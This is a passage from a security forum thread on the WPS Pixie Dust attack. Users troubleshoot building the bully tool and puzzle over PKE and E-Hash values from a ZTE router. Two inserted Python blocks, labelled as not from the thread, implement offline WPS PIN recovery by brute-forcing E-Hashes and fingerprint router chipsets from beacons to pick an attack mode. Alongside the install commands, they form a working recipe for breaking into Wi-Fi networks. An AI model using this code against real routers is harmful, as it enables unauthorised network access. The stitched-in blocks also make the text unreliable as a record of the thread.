
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #471
    Senior Member
    Join Date
    Sep 2013
    Posts
    262
    Quote: Is there any benefit over reaver?
    Without any doubt, if you use a Ralink USB (RT3070, RT3072, RT3570, RT3572), as they work very badly with reaver.
    For the rest of the chipsets it is more or less the same; try and you will see which you like more.
    Quote: or more vulnerability to other routers??
    Both use pixiewps and will exploit exactly the same vulnerabilities.

  2. #472
    Junior Member
    Join Date
    Apr 2015
    Location
    cosmoland
    Posts
    17
    soxrok2212, thanks for the reply,
    but this is the result:
    ERROR
    I use Kali 2.

    apt-get install libpcap-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following extra packages will be installed:
    libpcap0.8-dev......

    .................................................. ...........
    cd bully/src
    make
    compilation terminated.
    Makefile:19: recipe for target 'bully' failed
    make: *** [bully] Error 1
    Last edited by slmafiq; 2016-01-08 at 10:51 AM.

  3. #473
    Senior Member
    Join Date
    Aug 2013
    Location
    lost in space
    Posts
    580
    download again > decompress in /root so you have a bully-master folder. Then

    Code:
    cd /root/bully-master/src
    make
    make install

  4. #474
    Junior Member
    Join Date
    Apr 2015
    Location
    cosmoland
    Posts
    17
    Quote Originally Posted by Quest View Post
    download again > decompress in /root so you have a bully-master folder. Then

    Code:
    cd /root/bully-master/src
    make
    make install
    I made it this way
    wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
    cd '/root/bully-master/src'
    make
    sudo make install
    But have error

  5. #475
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    301
    Quote Originally Posted by slmafiq View Post
    I made it this way
    wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
    cd '/root/bully-master/src'
    make
    sudo make install
    But have error
    What "type of error"??
    Post it here!!
    If this is "RELATED to dependencies", try first:

    apt-get -y install build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

    after

    cd '/root/bully-master/src'
    make
    sudo make install

  6. #476
    Junior Member
    Join Date
    Apr 2015
    Location
    cosmoland
    Posts
    17
    Thanks zimmaro!
    I installed bully successfully!

    apt-get update
    apt-get -y install build-essential
    apt-get install libpcap-dev
    apt-get install libssl-dev

  7. #477
    Senior Member
    Join Date
    Sep 2013
    Posts
    262
    Crazy thing...
    I am testing a ZTE device (ZTE H218N) that is used by the ISP Jazztel (Spain).
    The device had PIN 12345670 enabled by default. A couple of years ago Jazztel made an update to "disable" WPS.
    My guess is that they "unconfigured" the PIN or voluntarily broke the protocol at some point.
    The router appears in wash....
    The majority of the time I get a continuous fail with our tools...

    But at some point... I get an M1, send an M2, receive an M3 and pixiewps is launched.
    Look at that:
    Incredible....
    The PKE is exactly the same as for the Realtek devices that are supported by pixiewps
    and
    E-Hash1 = E-Hash2

    Seeing this PKE again is pure madness.
    This PKE repeated all the time was the starting point of the discovery of the breach for Realtek....
    And we see it again on a Broadcom chipset...

    And what about this inconceivable same value for E-Hash1 and E-Hash2?
    It would mean that ES1 = ES2 and PSK1 = PSK2....
    ES1 and ES2 are not equal to 0 like for the Ralink, otherwise I would have got the results.
    PSK1 = PSK2 would only be possible if the PIN is 00000000.
    I tried to launch with 00000000 and didn't get anything.

    It is also strange to be able to send an M2 sometimes, and that may be something to dig into for other purposes (check https://forums.kali.org/showthread.p...ight=reboot+ap)

    This unsupported Broadcom device with PIN mode broken has a very strange behavior....

    The chipset, according to wikidevi, is:
    SoC Ram Flash Network USB Serial JTag
    Broadcom BCM5357 64MiB 16MiB 5 GbE Yes 2x v2.0 ? ?
    Last edited by kcdtv; 2016-01-17 at 07:10 PM.
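The reasoning in the post above (E-Hash1 = E-Hash2 implies ES1 = ES2 and PSK1 = PSK2, and the offline PIN recovery that only works when the enrollee nonces are known) can be checked with the WPS hash construction itself. The following is an added Python example, not code from the thread or from pixiewps/bully: AuthKey, PKE and PKR are constructed stand-ins for the values a registrar holds after M1/M2 (real lengths, fake contents), `ZERO_NONCE` models the Ralink E-S1 = E-S2 = 0 case, and `SECRET_ES1`/`SECRET_ES2` are constructed "properly random" nonces for the negative case.

```python
import hashlib
import hmac

# Constructed stand-ins (assumption, not captured data) for what the attacker,
# acting as WPS registrar, already holds after M1/M2: AuthKey (derived from the
# DH shared secret and both nonces), PKE (enrollee DH public key from M1) and
# PKR (our own DH public key from M2). Lengths match the protocol: 32/192/192.
AUTHKEY = hashlib.sha256(b"constructed AuthKey").digest()
PKE = (hashlib.sha512(b"constructed PKE").digest() * 3)[:192]
PKR = (hashlib.sha512(b"constructed PKR").digest() * 3)[:192]

ZERO_NONCE = bytes(16)  # the Ralink failure mode: E-S1 = E-S2 = 0
# Constructed "unknown" enrollee nonces for the case where the attack must fail.
SECRET_ES1 = hashlib.sha256(b"unknown E-S1").digest()[:16]
SECRET_ES2 = hashlib.sha256(b"unknown E-S2").digest()[:16]


def wps_checksum(pin7: int) -> int:
    """Check digit for a 7-digit WPS PIN body (digit weights 3,1,3,1,3,1,3)."""
    accum = sum(int(d) * (3 if i % 2 == 0 else 1)
                for i, d in enumerate(f"{pin7:07d}"))
    return (10 - accum % 10) % 10


def _psk(authkey: bytes, pin_half: str) -> bytes:
    # PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of the PIN half)
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    # E-HashN = HMAC-SHA256(AuthKey, E-SN || PSKN || PKE || PKR)
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3_hashes(pin, authkey=AUTHKEY, pke=PKE, pkr=PKR,
                       es1=ZERO_NONCE, es2=ZERO_NONCE):
    """What the enrollee puts in M3 for this PIN and these secret nonces."""
    eh1 = e_hash(authkey, es1, _psk(authkey, pin[:4]), pke, pkr)
    eh2 = e_hash(authkey, es2, _psk(authkey, pin[4:]), pke, pkr)
    return eh1, eh2


def recover_pin(eh1, eh2, authkey=AUTHKEY, pke=PKE, pkr=PKR,
                es1=ZERO_NONCE, es2=ZERO_NONCE, use_checksum=True):
    """Offline PIN recovery given guessed E-S1/E-S2; None if the guess is wrong.

    First half: at most 10^4 HMACs. Second half: 10^3 if the check digit is
    honoured, 10^4 otherwise. No further frames are sent to the AP.
    """
    first = next((f"{a:04d}" for a in range(10_000)
                  if hmac.compare_digest(
                      e_hash(authkey, es1, _psk(authkey, f"{a:04d}"), pke, pkr), eh1)),
                 None)
    if first is None:
        return None
    if use_checksum:
        seconds = (f"{b:03d}{wps_checksum(int(first + f'{b:03d}'))}" for b in range(1_000))
    else:
        seconds = (f"{b:04d}" for b in range(10_000))
    for second in seconds:
        if hmac.compare_digest(e_hash(authkey, es2, _psk(authkey, second), pke, pkr), eh2):
            return first + second
    return None


if __name__ == "__main__":
    eh1, eh2 = enrollee_m3_hashes("12345670")
    print("zero nonces, PIN 12345670 ->", recover_pin(eh1, eh2))
    z1, z2 = enrollee_m3_hashes("00000000")
    print("zero nonces, PIN 00000000: E-Hash1 == E-Hash2 ->", z1 == z2)
    r1, r2 = enrollee_m3_hashes("12345670", es1=SECRET_ES1, es2=SECRET_ES2)
    print("random nonces, zero guessed ->", recover_pin(r1, r2))
```

With zero nonces, equal E-Hashes need equal PSK halves, i.e. a PIN whose two halves are the same string; with unknown random nonces the same brute force finds nothing, which is the caveat kcdtv is working through.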

  8. #478
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    If you supply PIN 12345670 does it still recover the PSK? I think we briefly discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data... but then again the static PKE is too... provoking to ignore. Do you have any more ZTE H218N's you can test this on?

    UPDATE: I wonder if the network is using another device as the enrollee. Perhaps something like this is going on? Or try deauthing all the clients and see if you get the same result.
    [Attached image]
    Last edited by soxrok2212; 2016-01-17 at 09:14 PM.

  9. #479
    Member
    Join Date
    Mar 2015
    Posts
    47
    The new pixiewps, when modes are not specified, uses the PKE to try to determine the target. This means it's trying only for Realtek. You should try manually specifying all the modes --mode 1,2,3,4,5.

    Also in case of Ralink devices with push button active, the 2 hashes are identical because of pin and secret hashes equal to 0.

    In the beacon frame there could be the chipset vendor. It's under 'Tag vendor specific'.

    UPDATE: seems aanarchyy 's Bully doesn't run with --force. The nonce generated seems to be compatible with a Realtek device. I recommend again to test it manually and check in the beacon frame if the vendor information is present.
    Last edited by wiire; 2016-01-17 at 11:12 PM.
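wiire's tip, that the chipset vendor can be read from the beacon's "Tag: Vendor Specific" elements rather than from the WPS tags, can be automated. The following is an added Python example, not code from the thread or from any of the tools it mentions: it parses the tagged parameters of a beacon frame body, reports the OUI of every vendor-specific IE, and also decodes the identity attributes of the WPS IE (Microsoft OUI 00:50:F2, type 4). The OUI-to-vendor table is assumed from the IEEE registry (00:E0:4C Realtek, 00:0C:43 Ralink, 00:10:18 Broadcom), and the sample beacon is constructed, not a real capture.

```python
import struct

# Assumed from the IEEE OUI registry, not from the thread.
KNOWN_OUIS = {"00e04c": "Realtek", "000c43": "Ralink", "001018": "Broadcom"}
WPS_OUI = bytes.fromhex("0050f2")   # Microsoft OUI; vendor type 0x04 = WPS IE
WPS_TEXT_ATTRS = {0x1021: "Manufacturer", 0x1023: "Model Name",
                  0x1024: "Model Number", 0x1011: "Device Name"}
WPS_OTHER_ATTRS = {0x104A: "Version", 0x1044: "WPS State", 0x1041: "Selected Registrar"}


def parse_ies(ie_bytes: bytes):
    """Split an 802.11 tagged-parameter list into (tag, value) pairs; reject truncation."""
    out, i = [], 0
    while i < len(ie_bytes):
        if i + 2 > len(ie_bytes):
            raise ValueError("dangling IE header")
        tag, length = ie_bytes[i], ie_bytes[i + 1]
        value = ie_bytes[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"IE tag {tag} truncated")
        out.append((tag, value))
        i += 2 + length
    return out


def ies_well_formed(ie_bytes: bytes) -> bool:
    try:
        parse_ies(ie_bytes)
        return True
    except ValueError:
        return False


def parse_wps_attrs(data: bytes):
    """WPS attributes are TLVs: 16-bit type, 16-bit length, big-endian."""
    attrs, i = {}, 0
    while i + 4 <= len(data):
        atype, alen = struct.unpack(">HH", data[i:i + 4])
        attrs[atype] = data[i + 4:i + 4 + alen]
        i += 4 + alen
    return attrs


def vendor_hints(beacon_body: bytes):
    """Chipset OUIs and WPS identity attributes from a beacon management-frame body.

    The body is 12 fixed bytes (timestamp, beacon interval, capabilities)
    followed by the IEs; vendor-specific IEs carry tag 221.
    """
    hints = {"ssid": None, "vendor_ouis": [], "wps": {}}
    for tag, value in parse_ies(beacon_body[12:]):
        if tag == 0:
            hints["ssid"] = value.decode("utf-8", "replace")
        elif tag == 221 and len(value) >= 4:
            if value[:3] == WPS_OUI and value[3] == 0x04:
                for atype, aval in parse_wps_attrs(value[4:]).items():
                    if atype in WPS_TEXT_ATTRS:
                        hints["wps"][WPS_TEXT_ATTRS[atype]] = aval.decode("ascii", "replace")
                    elif atype in WPS_OTHER_ATTRS:
                        hints["wps"][WPS_OTHER_ATTRS[atype]] = aval.hex()
            else:
                oui = value[:3].hex()
                hints["vendor_ouis"].append((oui, KNOWN_OUIS.get(oui, "unknown")))
    return hints


# --- constructed sample beacon body (not a real capture) ---
def _ie(tag, value):
    return bytes([tag, len(value)]) + value


def _wps_attr(atype, value):
    return struct.pack(">HH", atype, len(value)) + value


_WPS_PAYLOAD = (_wps_attr(0x104A, b"\x10")          # Version 1.0
                + _wps_attr(0x1044, b"\x02")        # WPS state: configured
                + _wps_attr(0x1021, b"ExampleCo")
                + _wps_attr(0x1023, b"Example Model")
                + _wps_attr(0x1011, b"Example AP"))
SAMPLE_BEACON_BODY = (bytes(8) + struct.pack("<HH", 100, 0x0411)  # timestamp, interval, caps
                      + _ie(0, b"ExampleNet")
                      + _ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))   # supported rates
                      + _ie(221, WPS_OUI + b"\x04" + _WPS_PAYLOAD)
                      + _ie(221, bytes.fromhex("00e04c") + b"\x02" + bytes(6)))  # Realtek OUI, fake payload

if __name__ == "__main__":
    print(vendor_hints(SAMPLE_BEACON_BODY))
```

Feed it the frame body from a wash/airodump capture (everything after the 24-byte 802.11 header, FCS stripped) and the OUI list tells you whether the radio is Realtek, Ralink or Broadcom before you choose a pixiewps mode.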

  10. #480
    Senior Member
    Join Date
    Sep 2013
    Posts
    262
    Hi soxrok2212, Hi wiire

    First of all, it seems that wikidevi is wrong, or there may be several versions of the device... The point is that the chipset appears to be a Realtek one instead of a BCM:

    Thanks for the trick wiire: I always looked in the WPS tags and didn't notice that information could be gathered there.
    That would explain the presence of our "provocative PKE" in the M1 messages.
    It doesn't explain why pixiewps didn't launch a long bruteforce (I tried with --force or mode 3 --force, and I tried every mode separately).
    This case is definitely less weird/interesting than what I thought at first, as I thought it was a Broadcom device.
    I managed to repeat this "fake" pixie dust once and I got the Realtek PKE (as expected) and two identical E-Hashes again (like the first time; not the same E-Hash as the first time, but the same E-Hash1 and E-Hash2).
    I get a strange error if I put the stdout here (with or without code-quote)... If somebody wants it, ask me by PM and I will PM it to you (or you can get it from here: https://www.wifi-libre.com/topic-335...ado.html#p1776).
    Quote Originally Posted by soxrok2212
    If you supply PIN 12345670 does it still recover the PSK?
    Never ever since the firmware update (around 2014).
    Just from time to time you would get enough for a pixie dust... nothing else (never get an M5 or more).
    Quote Originally Posted by soxrok2212
    discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data
    Yes indeed.
    Seeing this Realtek PKE in what was supposed to be a Broadcom router, I got excited and thought that this data might lead to discovering another weakness in some unsupported Broadcom.
    But this ZTE router definitely has a Realtek chipset...
    Thanks for your "lights" about this.
